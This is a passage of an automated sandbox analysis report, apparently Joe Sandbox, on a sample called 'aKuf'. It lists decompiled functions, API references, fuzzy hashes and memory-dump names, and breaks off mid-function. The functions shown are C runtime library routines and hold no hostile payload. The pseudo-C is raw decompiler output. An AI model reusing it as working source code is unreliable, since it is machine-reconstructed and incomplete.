String ID: @.B$@.B
API String ID: 4212647719-183327057
Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction ID: 3674f645fd61808fa02d52529b37d3539aba0c7be93acc02108115ec9dcea077
Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
Instruction Fuzzy Hash: D3E08632551A3215CF356B1CB800F6F9E947FD2712B1B116EF848E7155DB644C838DA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040C73D Relevance: 7.6, APIs: 5, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t21;
				signed int _t22;
				intOrPtr* _t27;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t50;

				_t37 = __edx;
				_push(8);
				_push(0x421140);
				E0040E1D8(__ebx, __edi, __esi);
				_t39 = _a4;
				_t50 = _t39;
				_t51 = _t50 != 0;
				if(_t50 != 0) {
					E0040FB29(_t39);
					_v8 = 0;
					 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
					_t16 = E0040FA20(__edx, _t39, _t39);
					__eflags = _t16 - 0xffffffff;
					if(_t16 == 0xffffffff) {
						L6:
						_t17 = 0x4227e0;
					} else {
						_t21 = E0040FA20(__edx, _t39, _t39);
						__eflags = _t21 - 0xfffffffe;
						if(_t21 == 0xfffffffe) {
							goto L6;
						} else {
							_t22 = E0040FA20(__edx, _t39, _t39);
							_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
						}
					}
					_t9 = _t17 + 4; // 0xa80
					 *(_t17 + 4) =  *_t9 & 0x000000fd;
					_v8 = 0xfffffffe;
					E0040C735(_t39);
					_t19 = 0;
					__eflags = 0;
				} else {
					_t27 = E0040BFC1(_t51);
					_t40 = 0x16;
					 *_t27 = _t40;
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E0040E744(__edx, _t40, 0);
					_t19 = _t40;
				}
				return E0040E21D(_t19);
			}

0x0040c73d
0x0040c690
0x0040c692
0x0040c697
0x0040c69e
0x0040c6a3
0x0040c6a8
0x0040c6aa
0x0040c6c8
0x0040c6ce
0x0040c6d1
0x0040c6d6
0x0040c6dc
0x0040c6df
0x0040c70f
0x0040c70f
0x0040c6e1
0x0040c6e2
0x0040c6e8
0x0040c6eb
0x00000000
0x0040c6ed
0x0040c6ee
0x0040c70b
0x0040c70b
0x0040c6eb
0x0040c714
0x0040c71b
0x0040c71e
0x0040c725
0x0040c72a
0x0040c72a
0x0040c6ac
0x0040c6ac
0x0040c6b3
0x0040c6b4
0x0040c6b6
0x0040c6b7
0x0040c6b8
0x0040c6b9
0x0040c6ba
0x0040c6bb
0x0040c6c3
0x0040c6c3
0x0040c731

APIs

__lock_file.LIBCMT ref: 0040C6C8
__fileno.LIBCMT ref: 0040C6D6
__fileno.LIBCMT ref: 0040C6E2
__fileno.LIBCMT ref: 0040C6EE
__fileno.LIBCMT ref: 0040C6FE

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
String ID:
API String ID: 2805327698-0
Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

Uniqueness

Uniqueness Score: -1.00%

Function 00594233 Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0059423F

Part of subcall function 0059099C: __getptd_noexit.LIBCMT ref: 0059099F
Part of subcall function 0059099C: __amsg_exit.LIBCMT ref: 005909AC

__amsg_exit.LIBCMT ref: 0059425F
__lock.LIBCMT ref: 0059426F
InterlockedDecrement.KERNEL32(?), ref: 0059428C
InterlockedIncrement.KERNEL32(00422D38), ref: 005942B7

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 91fbce255eb76b5d32cbef811b4b03adc7d4934eb1e92c4e191f74752ca4f02b
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 3601A135A01622EBDF25AB24980AB6ABF60BF84710F400015FC14A72D1C7746D82CFD9

Uniqueness

Uniqueness Score: -1.00%

Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E00413FCC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x421490);
				E0040E1D8(__ebx, __edi, __esi);
				_t31 = E00410735(__ebx, __edx, __edi, _t35);
				_t15 =  *0x422e34; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040D6E0(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x422d38; // 0x2161648
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x422910;
								if(__eflags != 0) {
									_push(_t33);
									E0040B6B5(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x422d38; // 0x2161648
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x422d38; // 0x2161648
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00414067();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E0040E79A(_t29, _t31, 0x20);
				}
				return E0040E21D(_t33);
			}

0x00413fcc
0x00413fcc
0x00413fcc
0x00413fcc
0x00413fce
0x00413fd3
0x00413fdd
0x00413fdf
0x00413fe7
0x00414008
0x0041400e
0x00414012
0x00414015
0x00414018
0x0041401e
0x00414020
0x00414022
0x00414025
0x0041402b
0x0041402d
0x0041402f
0x00414035
0x00414037
0x00414038
0x0041403d
0x00414035
0x0041402d
0x0041403e
0x00414043
0x00414046
0x0041404c
0x00414050
0x00414050
0x00414056
0x0041405d
0x00413fef
0x00413fef
0x00413fef
0x00413ff4
0x00413ff8
0x00413ffd
0x00414005

APIs

__getptd.LIBCMT ref: 00413FD8

Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745

__amsg_exit.LIBCMT ref: 00413FF8
__lock.LIBCMT ref: 00414008
InterlockedDecrement.KERNEL32(?), ref: 00414025
InterlockedIncrement.KERNEL32(02161648), ref: 00414050

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

Uniqueness

Uniqueness Score: -1.00%

Function 00591161 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

l, xrefs: 00591188
2, xrefs: 005911E2
, xrefs: 005911AF

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID:
String ID: $2$l
API String ID: 0-3132104027
Opcode ID: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
Instruction ID: 74b2b34e3667201b0253faa52daec1fcab26332a1459c7c5548a0ea9d9d7aae9
Opcode Fuzzy Hash: 93ec677eb6f37e13f038257329e2d2bc6cd763e678568b4eabc98800338fe0cb
Instruction Fuzzy Hash: AB41E038805A7A8EDF348E25889C3F87FB1BB02351F2405CAD4A96B192C7754EC6DF49

Uniqueness

Uniqueness Score: -1.00%

Function 0058FCBF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0058FCE1
__calloc_crt.LIBCMT ref: 0058FCFA

Strings

`$B, xrefs: 0058FD33
P$B, xrefs: 0058FD11

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: __calloc_crt
String ID: P$B$`$B
API String ID: 3494438863-235554963
Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
Instruction ID: 857becf11aaf4e55e14aab3c70526e20855307bf7eff0cc35f6739a2a952eefc
Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
Instruction Fuzzy Hash: 5E110A313096265BE724BF1CBC55B752B91FBCC3247644636EB11EB2A4E770DC824758

Uniqueness

Uniqueness Score: -1.00%

Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00413610() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x41fb50;
					_v28 =  *0x41fb48;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x00413615
0x0041361d
0x00413634
0x004135e0
0x004135e9
0x004135f5
0x004135f8
0x004135fb
0x004135fd
0x00413600
0x00413605
0x0041360f
0x00413607
0x0041360b
0x0041360b
0x0041361f
0x00413625
0x0041362d
0x00000000
0x0041362f
0x0041362f
0x00413633
0x00413633
0x0041362d

APIs

GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625

Strings

IsProcessorFeaturePresent, xrefs: 0041361F
KERNEL32, xrefs: 00413610

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

Uniqueness

Uniqueness Score: -1.00%

Function 00581B57 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 00581B6D
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 00581B96
GetLastError.KERNEL32 ref: 00581BA7
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00581BBF
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00581BE7

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: fccd2c2468feabad41b2399c6ee95d150770ca45416534a0488a8ead9d2178be
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: EE11C4311007547BD330A715CC88F677F6CEBC6BA9F008114FD45AA281D621AC05C7B8

Uniqueness

Uniqueness Score: -1.00%

Function 0058C9AF Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

__fileno.LIBCMT ref: 0058C9E3
__locking.LIBCMT ref: 0058C9F8

Part of subcall function 0058C228: __getptd_noexit.LIBCMT ref: 0058C228

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: __fileno__getptd_noexit__locking
String ID:
API String ID: 630670418-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 152afd6a54d6e108521a8e2482f69335f46df897b9ea4dd5084031826c3143b4
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CB51C171E00609ABDB14EF68C886B68BFB1FF44355F5481A9DD15B7281D730EE40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040C748 Relevance: 6.1, APIs: 4, Instructions: 148
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0040C748(void* __edx, void* __esi, char _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				intOrPtr _t73;
				signed int _t75;
				signed int _t81;
				char _t82;
				signed int _t84;
				intOrPtr* _t86;
				signed int _t87;
				intOrPtr* _t90;
				signed int _t92;
				signed int _t94;
				void* _t96;
				signed char _t98;
				signed int _t99;
				intOrPtr _t102;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t111;
				signed int _t114;
				intOrPtr _t115;

				_t105 = __esi;
				_t97 = __edx;
				_t104 = _a4;
				_t87 = 0;
				_t121 = _t104;
				if(_t104 != 0) {
					_t70 = E0040FA20(__edx, _t104, _t104);
					__eflags =  *(_t104 + 4);
					_v8 = _t70;
					if(__eflags < 0) {
						 *(_t104 + 4) = 0;
					}
					_push(1);
					_push(_t87);
					_push(_t70);
					_t71 = E00411939(_t87, _t97, _t104, _t105, __eflags);
					__eflags = _t71 - _t87;
					_v12 = _t71;
					if(_t71 < _t87) {
						L2:
						return _t71 | 0xffffffff;
					} else {
						_t98 =  *(_t104 + 0xc);
						__eflags = _t98 & 0x00000108;
						if((_t98 & 0x00000108) != 0) {
							_t73 =  *_t104;
							_t92 =  *(_t104 + 8);
							_push(_t105);
							_v16 = _t73 - _t92;
							__eflags = _t98 & 0x00000003;
							if((_t98 & 0x00000003) == 0) {
								__eflags = _t98;
								if(__eflags < 0) {
									L15:
									__eflags = _v12 - _t87;
									if(_v12 != _t87) {
										__eflags =  *(_t104 + 0xc) & 0x00000001;
										if(( *(_t104 + 0xc) & 0x00000001) == 0) {
											L40:
											_t75 = _v16 + _v12;
											__eflags = _t75;
											L41:
											return _t75;
										}
										_t99 =  *(_t104 + 4);
										__eflags = _t99 - _t87;
										if(_t99 != _t87) {
											_t90 = 0x423f60 + (_v8 >> 5) * 4;
											_a4 = _t73 - _t92 + _t99;
											_t111 = (_v8 & 0x0000001f) << 6;
											__eflags =  *( *_t90 + _t111 + 4) & 0x00000080;
											if(__eflags == 0) {
												L39:
												_t66 =  &_v12;
												 *_t66 = _v12 - _a4;
												__eflags =  *_t66;
												goto L40;
											}
											_push(2);
											_push(0);
											_push(_v8);
											__eflags = E00411939(_t90, _t99, _t104, _t111, __eflags) - _v12;
											if(__eflags != 0) {
												_push(0);
												_push(_v12);
												_push(_v8);
												_t81 = E00411939(_t90, _t99, _t104, _t111, __eflags);
												__eflags = _t81;
												if(_t81 >= 0) {
													_t82 = 0x200;
													__eflags = _a4 - 0x200;
													if(_a4 > 0x200) {
														L35:
														_t82 =  *((intOrPtr*)(_t104 + 0x18));
														L36:
														_a4 = _t82;
														__eflags =  *( *_t90 + _t111 + 4) & 0x00000004;
														L37:
														if(__eflags != 0) {
															_t63 =  &_a4;
															 *_t63 = _a4 + 1;
															__eflags =  *_t63;
														}
														goto L39;
													}
													_t94 =  *(_t104 + 0xc);
													__eflags = _t94 & 0x00000008;
													if((_t94 & 0x00000008) == 0) {
														goto L35;
													}
													__eflags = _t94 & 0x00000400;
													if((_t94 & 0x00000400) == 0) {
														goto L36;
													}
													goto L35;
												}
												L31:
												_t75 = _t81 | 0xffffffff;
												goto L41;
											}
											_t84 =  *(_t104 + 8);
											_t96 = _a4 + _t84;
											while(1) {
												__eflags = _t84 - _t96;
												if(_t84 >= _t96) {
													break;
												}
												__eflags =  *_t84 - 0xa;
												if( *_t84 == 0xa) {
													_t44 =  &_a4;
													 *_t44 = _a4 + 1;
													__eflags =  *_t44;
												}
												_t84 = _t84 + 1;
												__eflags = _t84;
											}
											__eflags =  *(_t104 + 0xc) & 0x00002000;
											goto L37;
										}
										_v16 = _t87;
										goto L40;
									}
									_t75 = _v16;
									goto L41;
								}
								_t81 = E0040BFC1(__eflags);
								 *_t81 = 0x16;
								goto L31;
							}
							_t102 =  *((intOrPtr*)(0x423f60 + (_v8 >> 5) * 4));
							_t114 = (_v8 & 0x0000001f) << 6;
							__eflags =  *(_t102 + _t114 + 4) & 0x00000080;
							if(( *(_t102 + _t114 + 4) & 0x00000080) == 0) {
								goto L15;
							}
							_t103 = _t92;
							__eflags = _t103 - _t73;
							if(_t103 >= _t73) {
								goto L15;
							}
							_t115 = _t73;
							do {
								__eflags =  *_t103 - 0xa;
								if( *_t103 == 0xa) {
									_v16 = _v16 + 1;
									_t87 = 0;
									__eflags = 0;
								}
								_t103 = _t103 + 1;
								__eflags = _t103 - _t115;
							} while (_t103 < _t115);
							goto L15;
						}
						return _t71 -  *(_t104 + 4);
					}
				}
				_t86 = E0040BFC1(_t121);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				 *_t86 = 0x16;
				_t71 = E0040E744(__edx, _t104, __esi);
				goto L2;
			}

0x0040c748
0x0040c748
0x0040c752
0x0040c755
0x0040c757
0x0040c759
0x0040c77c
0x0040c781
0x0040c785
0x0040c788
0x0040c78a
0x0040c78a
0x0040c78d
0x0040c78f
0x0040c790
0x0040c791
0x0040c799
0x0040c79b
0x0040c79e
0x0040c773
0x00000000
0x0040c7a0
0x0040c7a0
0x0040c7a3
0x0040c7a9
0x0040c7b3
0x0040c7b5
0x0040c7b8
0x0040c7bd
0x0040c7c0
0x0040c7c3
0x0040c806
0x0040c808
0x0040c7f9
0x0040c7f9
0x0040c7fc
0x0040c81a
0x0040c81e
0x0040c8d8
0x0040c8de
0x0040c8de
0x0040c8e0
0x00000000
0x0040c8e0
0x0040c824
0x0040c827
0x0040c829
0x0040c843
0x0040c84a
0x0040c84f
0x0040c852
0x0040c857
0x0040c8d2
0x0040c8d5
0x0040c8d5
0x0040c8d5
0x00000000
0x0040c8d5
0x0040c859
0x0040c85b
0x0040c85d
0x0040c868
0x0040c86b
0x0040c88d
0x0040c88f
0x0040c892
0x0040c895
0x0040c89d
0x0040c89f
0x0040c8a6
0x0040c8ab
0x0040c8ae
0x0040c8c0
0x0040c8c0
0x0040c8c3
0x0040c8c3
0x0040c8c8
0x0040c8cd
0x0040c8cd
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x0040c8cf
0x00000000
0x0040c8cd
0x0040c8b0
0x0040c8b3
0x0040c8b6
0x00000000
0x00000000
0x0040c8b8
0x0040c8be
0x00000000
0x00000000
0x00000000
0x0040c8be
0x0040c8a1
0x0040c8a1
0x00000000
0x0040c8a1
0x0040c86d
0x0040c873
0x0040c880
0x0040c880
0x0040c882
0x00000000
0x00000000
0x0040c877
0x0040c87a
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87c
0x0040c87f
0x0040c87f
0x0040c87f
0x0040c884
0x00000000
0x0040c884
0x0040c82b
0x00000000
0x0040c82b
0x0040c7fe
0x00000000
0x0040c7fe
0x0040c80a
0x0040c80f
0x00000000
0x0040c80f
0x0040c7ce
0x0040c7d8
0x0040c7db
0x0040c7e0
0x00000000
0x00000000
0x0040c7e2
0x0040c7e4
0x0040c7e6
0x00000000
0x00000000
0x0040c7e8
0x0040c7ea
0x0040c7ea
0x0040c7ed
0x0040c7ef
0x0040c7f2
0x0040c7f2
0x0040c7f2
0x0040c7f4
0x0040c7f5
0x0040c7f5
0x00000000
0x0040c7ea
0x00000000
0x0040c7ab
0x0040c79e
0x0040c75b
0x0040c760
0x0040c761
0x0040c762
0x0040c763
0x0040c764
0x0040c765
0x0040c76b
0x00000000

APIs

__fileno.LIBCMT ref: 0040C77C
__locking.LIBCMT ref: 0040C791

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000002.00000002.337856885.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.337856885.0000000000426000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.337856885.000000000042F000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_aKuf.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__getptd_noexit__locking
String ID:
API String ID: 2395185920-0
Opcode ID: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
Opcode Fuzzy Hash: a22d1fa1ad15e425548c743ff76317c9d1fdeb5a65110bd21edd49740b19d0ba
Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Uniqueness

Uniqueness Score: -1.00%

Function 0058BD11 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 0058BDD5
__fileno.LIBCMT ref: 0058BDF5
__locking.LIBCMT ref: 0058BDFC
__flsbuf.LIBCMT ref: 0058BE27

Part of subcall function 0058C228: __getptd_noexit.LIBCMT ref: 0058C228

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: __fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 1291973410-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 7df367aa34391d192001063c7b46acb340f1bd0c84b23e401174041a95e3b2bf
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: 8441A431A01605EFEB24BF6988856AEBFBDFF80720F248529EC65BB140D770DE418B50

Uniqueness

Uniqueness Score: -1.00%

Function 00585F67 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00585FBB
_memset.LIBCMT ref: 00585FD6
_fseek.LIBCMT ref: 00586044

Memory Dump Source

Source File: 00000002.00000002.337934822.0000000000580000.00000040.00001000.00020000.00000000.sdmp, Offset: 00580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_580000_aKuf.jbxd

Yara matches

Similarity

API ID: _fseek_malloc_memset
String ID:
API String ID: 208892515-0
Opcode ID: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction ID: d1e8a00d2c72a9010c91b5e572dbccf57668a7f48de745e55d60f7935faa99b2
Opcode Fuzzy Hash: 9872aa7f1147e6bc872b805e495ff45a5b2212b2fe58f3118e87b4f331b1c2a2
Instruction Fuzzy Hash: 9441E772604B11CAD730A62DA90C7177AE5BFC0354F240A1DEED6E67D0E731E845C755

Uniqueness

Uniqueness Score: -1.00%

Function 00405D00 Relevance: 6.1, APIs: 4, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00405D00(void* __ebx, void* __edx, void* __ebp, signed int* _a4, signed int _a8, intOrPtr _a12) {
				void* __edi;
				void* __esi;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t35;
				signed int _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t45;
				signed int _t48;
				signed int* _t53;
				void* _t54;
				void* _t55;
				void* _t57;

				_t54 = __ebp;
				_t45 = __edx;
				_t42 = __ebx;
				_t53 = _a4;
				if(_t53 == 0) {
					L40:
					_t31 = _t30 | 0xffffffff;
					__eflags = _t31;
					return _t31;
				} else {
					_t43 = _a12;
					if(_t43 == 2) {
						goto L40;
					} else {
						_t30 = _t53[0xe];
						if(_t30 == 0xffffffff || _t30 == 0xfffffffd) {
							goto L40;
						} else {
							_t48 = _a8;
							if(_t53[0x17] != 0x77) {
								__eflags = _t43 - 1;
								if(_t43 == 1) {
									_t48 = _t48 + _t53[0x1a];
									__eflags = _t48;
								}
								__eflags = _t48;
								if(_t48 < 0) {
									goto L39;
								} else {
									__eflags = _t53[0x16];
									if(__eflags == 0) {
										_t33 = _t53[0x1a];
										__eflags = _t48 - _t33;
										if(_t48 < _t33) {
											_t30 = E004054F0(_t42, _t54, _t53);
											_t55 = _t55 + 4;
											__eflags = _t30;
											if(_t30 < 0) {
												goto L39;
											} else {
												goto L27;
											}
										} else {
											_t48 = _t48 - _t33;
											L27:
											__eflags = _t48;
											if(_t48 == 0) {
												L38:
												return _t53[0x1a];
											} else {
												__eflags = _t53[0x12];
												if(_t53[0x12] != 0) {
													L30:
													__eflags = _t53[0x1b] - 0xffffffff;
													if(_t53[0x1b] != 0xffffffff) {
														_t53[0x1a] = _t53[0x1a] + 1;
														_t48 = _t48 - 1;
														__eflags = _t53[0x1c];
														_t53[0x1b] = 0xffffffff;
														if(_t53[0x1c] != 0) {
															_t53[0xe] = 1;
														}
													}
													__eflags = _t48;
													if(_t48 <= 0) {
														goto L38;
													} else {
														while(1) {
															_t35 = 0x4000;
															__eflags = _t48 - 0x4000;
															if(_t48 < 0x4000) {
																_t35 = _t48;
															}
															_t30 = E00405A20(_t45, _t53, _t53[0x12], _t35);
															_t55 = _t55 + 0xc;
															__eflags = _t30;
															if(_t30 <= 0) {
																goto L39;
															}
															_t48 = _t48 - _t30;
															__eflags = _t48;
